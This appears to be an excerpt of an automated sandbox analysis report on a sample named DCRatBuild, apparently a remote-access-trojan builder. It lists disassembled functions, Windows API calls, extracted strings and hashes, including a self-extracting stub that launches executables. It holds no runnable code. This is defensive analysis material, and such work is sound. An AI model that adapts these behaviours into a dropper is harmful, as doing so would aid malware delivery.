SetWindowTextW.USER32(00000000,?), ref: 00B2CC46
SendMessageW.USER32(00000000,00000143,00000000,00B5A472), ref: 00B2CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B2CC7F

Strings

%s.%d.tmp, xrefs: 00B2C940
ProgramFilesDir, xrefs: 00B2CB45
<br>, xrefs: 00B2C9D4
Software\Microsoft\Windows\CurrentVersion, xrefs: 00B2CB1A

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 7ea42c3d74d09832bce46ee795d68814926aa6c63122b42ea199560d4b88f145
Instruction ID: 6742c3fd36c445e86ee83712a5884a2e83ff47a6504a97bde236b642bd87f4a1
Opcode Fuzzy Hash: 7ea42c3d74d09832bce46ee795d68814926aa6c63122b42ea199560d4b88f145
Instruction Fuzzy Hash: 8DE14F72900229AADB25DBA0EC85EEE77FCEB05750F5445E6F609E3050EF749B848B60

Function 00B1DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B1DA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B1DAAC

Part of subcall function 00B1C29A: _wcslen.LIBCMT ref: 00B1C2A2

Part of subcall function 00B205DA: _wcslen.LIBCMT ref: 00B205E0

Part of subcall function 00B21B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B1BAE9,00000000,?,?,?,00010484), ref: 00B21BA0

_wcslen.LIBCMT ref: 00B1DDE9
__fprintf_l.LIBCMT ref: 00B1DF1C

Strings

*messages***, xrefs: 00B1DBFA
a, xrefs: 00B1DC16
RTL, xrefs: 00B1DEDE
R, xrefs: 00B1DC0C
$%s:, xrefs: 00B1DEFF
, xrefs: 00B1DD6C
*messages***, xrefs: 00B1DBC1
@%s:, xrefs: 00B1DF06, 00B1DF12
,, xrefs: 00B1DF57

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 1b30b1d849826bb574a0ed4333153ac17a67916735b73c0a0349eaa3f8278c5e
Instruction ID: 96444fb0b04ed244b28fdec162cfa521e3a3ab056321019c304e63e4572c0268
Opcode Fuzzy Hash: 1b30b1d849826bb574a0ed4333153ac17a67916735b73c0a0349eaa3f8278c5e
Instruction Fuzzy Hash: BF32F372900218EBCF24EF68C886AEA37E5FF08700F9405AAF915A7291D771DDC4CB90

Function 00B2D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B2B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B2B579
Part of subcall function 00B2B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B2B58A
Part of subcall function 00B2B568: IsDialogMessageW.USER32(00010484,?), ref: 00B2B59E
Part of subcall function 00B2B568: TranslateMessage.USER32(?), ref: 00B2B5AC
Part of subcall function 00B2B568: DispatchMessageW.USER32(?), ref: 00B2B5B6

GetDlgItem.USER32(00000068,00B6FCB8), ref: 00B2D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00B2AF07,00000001,?,?,00B2B7B9,00B4506C,00B6FCB8,00B6FCB8,00001000,00000000,00000000), ref: 00B2D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B2D51B
SendMessageW.USER32(00000000,000000C2,00000000,00B435F4), ref: 00B2D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B2D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B2D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B2D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B2D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B2D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B2D5E1
SendMessageW.USER32(00000000,000000C2,00000000,00B443F4), ref: 00B2D5F0

Strings

\, xrefs: 00B2D549

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: c249c96889eb1ccee16b1b7fe112e29996ea0469d19df8436bd551430c0b9d6b
Instruction ID: 92ada9f2f07fa33d08bbcc6a87604a98fefbced425b5aa93fcafabe75b746e30
Opcode Fuzzy Hash: c249c96889eb1ccee16b1b7fe112e29996ea0469d19df8436bd551430c0b9d6b
Instruction Fuzzy Hash: 8E31F371144342AFD301DF20EC0AFAB7FECEB82B05F000908F995972A0DF658A449776

Function 00B2D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00B2D7AE
ShellExecuteExW.SHELL32(?), ref: 00B2D8DE
ShowWindow.USER32(?,00000000), ref: 00B2D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 00B2D959
CloseHandle.KERNEL32(?), ref: 00B2D97F
ShowWindow.USER32(?,00000001), ref: 00B2D9E1

Strings

.inf, xrefs: 00B2D89A
.exe, xrefs: 00B2D989

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: d1404be4f7dd3779c83bb6a547407533982311747ccb0a7d6a9b8cf2b9c97f65
Instruction ID: b42efa339e0e1375d68d7804d74fb7b6320177f1ffbee9a21abbf40cbc9ab0f2
Opcode Fuzzy Hash: d1404be4f7dd3779c83bb6a547407533982311747ccb0a7d6a9b8cf2b9c97f65
Instruction Fuzzy Hash: 9151E5705083A09AEB309F24B844BAB7BE4EF45744F04089EF5C99B191DBB5CEC5DB52

Function 00B3A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B35695,00B35695,?,?,?,00B3ABAC,00000001,00000001,2DE85006), ref: 00B3A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B3ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00B3AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B3AB35
__freea.LIBCMT ref: 00B3AB42

Part of subcall function 00B38E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B3CA2C,00000000,?,00B36CBE,?,00000008,?,00B391E0,?,?,?), ref: 00B38E38

__freea.LIBCMT ref: 00B3AB4B
__freea.LIBCMT ref: 00B3AB70

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: e8baf8ae52bbfe93c8b14cbab2e71bad420f42e367fcedeef99a2ca11eda418d
Instruction ID: 3ac0d0e7dcc878ca52bea4cab47ab1f988ef949305a0eda3a3fb699b83ae7919
Opcode Fuzzy Hash: e8baf8ae52bbfe93c8b14cbab2e71bad420f42e367fcedeef99a2ca11eda418d
Instruction Fuzzy Hash: DE51E072600216AFDB258F64CC82EBBB7EAEB44710F3546A8FC44E7150EB34DC40C6A2

Function 00B33B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00B33C35,?,?,00B72088,00000000,?,00B33D60,00000004,InitializeCriticalSectionEx,00B46394,InitializeCriticalSectionEx,00000000), ref: 00B33C03

Strings

api-ms-, xrefs: 00B33BC3

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 671dd9c7a185b96a81c7e8aaccf62764dbf7bf57bdb7b9569ac1c76f5af494b4
Instruction ID: f121f62d7d39f256620a7c2f7e8da32fb15a205a6c4c6f106d93ebe925f499ce
Opcode Fuzzy Hash: 671dd9c7a185b96a81c7e8aaccf62764dbf7bf57bdb7b9569ac1c76f5af494b4
Instruction Fuzzy Hash: BB117735A45625ABCB218B5C9C8575BB7E4EF02F70F350291E915EB290F771EF0086D1

Function 00B2AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B2081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B20836
Part of subcall function 00B2081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B1F2D8,Crypt32.dll,00000000,00B1F35C,?,?,00B1F33E,?,?,?), ref: 00B20858

OleInitialize.OLE32(00000000), ref: 00B2AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B2AC66
SHGetMalloc.SHELL32(00B58438), ref: 00B2AC70

Strings

3Ro, xrefs: 00B2AC47
riched20.dll, xrefs: 00B2AC1E

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Ro
API String ID: 3498096277-3613677438
Opcode ID: a8183905578cb234643773c57e27deaf4ac9005228c99b6f5c6029160407da61
Instruction ID: 1941f1c6e886d3f697072f31cb240e908f8d2995ee38ede84045c05eb9cb8973
Opcode Fuzzy Hash: a8183905578cb234643773c57e27deaf4ac9005228c99b6f5c6029160407da61
Instruction Fuzzy Hash: 24F0FFB1900219ABCB10AFA9D849ADFFFFCEF84701F00415AE815A2251DBB456459BA1

Function 00B198E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00B17760,?,00000005,?,00000011), ref: 00B1995F
GetLastError.KERNEL32(?,?,00B17760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B1996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00B17760,?,00000005,?), ref: 00B199A2
GetLastError.KERNEL32(?,?,00B17760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B199AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B17760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B199F9

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 838427918c9ed010f02c17fd90fb348ba1128eb472504babae31922bc8e066d9
Instruction ID: 95b05dd71aea04057aaf57e108506191a252fc8c1cdfd6e63f91abdc3fa07f24
Opcode Fuzzy Hash: 838427918c9ed010f02c17fd90fb348ba1128eb472504babae31922bc8e066d9
Instruction Fuzzy Hash: 763125305443856FE7309F24CC86BEABBD8FB05360F640B5DF9A1962D1D7B4AA84CB91

Function 00B2B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B2B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B2B58A
IsDialogMessageW.USER32(00010484,?), ref: 00B2B59E
TranslateMessage.USER32(?), ref: 00B2B5AC
DispatchMessageW.USER32(?), ref: 00B2B5B6

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 5d312a8651e29041a39c5157fbac6a43f7ed4a6b58ef68667492a17caea3fc8e
Instruction ID: a0684e57ffcb3087403705517f657356d25c9b237debd393ade518e201a103e2
Opcode Fuzzy Hash: 5d312a8651e29041a39c5157fbac6a43f7ed4a6b58ef68667492a17caea3fc8e
Instruction Fuzzy Hash: 6EF0A971A0122AAA8B209BA5AC4CEDB7FECEE057917404455B909D3014EF28D645DBB0

Function 00B2ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00B2ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00B2ABF9

Part of subcall function 00B21FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B1C116,00000000,.exe,?,?,00000800,?,?,?,00B28E3C), ref: 00B21FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B2ABE9

Strings

EDIT, xrefs: 00B2ABCD, 00B2ABD8, 00B2ABE5

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 64c5bd3909fd063bacf6cf20823e0cdfbc1ed3545a1c80b876ccf9b755dfb37e
Instruction ID: 1adf5aef5c2deac610bd033ad16be249b24baeb5c99d5506ba00ac36a2dacd91
Opcode Fuzzy Hash: 64c5bd3909fd063bacf6cf20823e0cdfbc1ed3545a1c80b876ccf9b755dfb37e
Instruction Fuzzy Hash: C6F082326002387BDB206624AC09F9B76EC9B46F40F484091FA09E3180DB64DE85D5B6

Function 00B2DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B2DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B2DC30

Strings

sfxcmd, xrefs: 00B2DBEF
sfxpar, xrefs: 00B2DC2B

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: d221121e1ac035ee036eb298f2a31b0f8c2b4f4dd264738d80e3b776f0c5aab1
Instruction ID: d492c95e9414c9308c1ceb61aa7dd0e146fa7f8f667f13dd5494018a4e35db27
Opcode Fuzzy Hash: d221121e1ac035ee036eb298f2a31b0f8c2b4f4dd264738d80e3b776f0c5aab1
Instruction Fuzzy Hash: 19F0A77241423467CB202B99AC06BAA37D8EF05B81B040491BD89A6152D6B08A80D6B0

Function 00B19785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B19795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00B197AD
GetLastError.KERNEL32 ref: 00B197DF
GetLastError.KERNEL32 ref: 00B197FE

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: ed0e2af6861f0916392e49d8ce835e0cf1b7d321c6f34953673b53c36258c841
Instruction ID: 02635b898e9107b592b6e12f36e0cc0872a58b1ca4f859a9ffb95adacef9223e
Opcode Fuzzy Hash: ed0e2af6861f0916392e49d8ce835e0cf1b7d321c6f34953673b53c36258c841
Instruction Fuzzy Hash: 4F11C234910244EBDF205F24C8646E937E9FF02BA0F908AA9F416C62D0D7709EC4DB61

Function 00B3AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B33F73,00000000,00000000,?,00B3ACDB,00B33F73,00000000,00000000,00000000,?,00B3AED8,00000006,FlsSetValue), ref: 00B3AD66
GetLastError.KERNEL32(?,00B3ACDB,00B33F73,00000000,00000000,00000000,?,00B3AED8,00000006,FlsSetValue,00B47970,FlsSetValue,00000000,00000364,?,00B398B7), ref: 00B3AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B3ACDB,00B33F73,00000000,00000000,00000000,?,00B3AED8,00000006,FlsSetValue,00B47970,FlsSetValue,00000000), ref: 00B3AD80

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 76356f2f2795573ae8e2edf27fd96a472f58c5037f724e70a7a76ae5636049a2
Instruction ID: 03b4ddd7ccf3bfabf2794813e9a890a5cf3a136602c97b591d35c5941ed9a7c0
Opcode Fuzzy Hash: 76356f2f2795573ae8e2edf27fd96a472f58c5037f724e70a7a76ae5636049a2
Instruction Fuzzy Hash: B701F73A201222ABC7214F689C88A577BE8FF06BA2F350774F946D3660DF20D901C6E1

Function 00B19F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B1D343,00000001,?,?,?,00000000,00B2551D,?,?,?), ref: 00B19F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00B2551D,?,?,?,?,?,00B24FC7,?), ref: 00B19FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00B1D343,00000001,?,?), ref: 00B1A011

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 2703ad30308ccf689228599acbd58986e38f71a64fbeef2e22bfa4ec5efd04ec
Instruction ID: 008ad71bfb799ba06179814547ccbe45d97eb18b61d942a3a4bd178688fedcfb
Opcode Fuzzy Hash: 2703ad30308ccf689228599acbd58986e38f71a64fbeef2e22bfa4ec5efd04ec
Instruction Fuzzy Hash: 0D31F131208345AFDB14CF20D818BAE77E5FF84B11F440A5DF88197290CB75AE88CBA2

Function 00B1A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00B1C27E: _wcslen.LIBCMT ref: 00B1C284

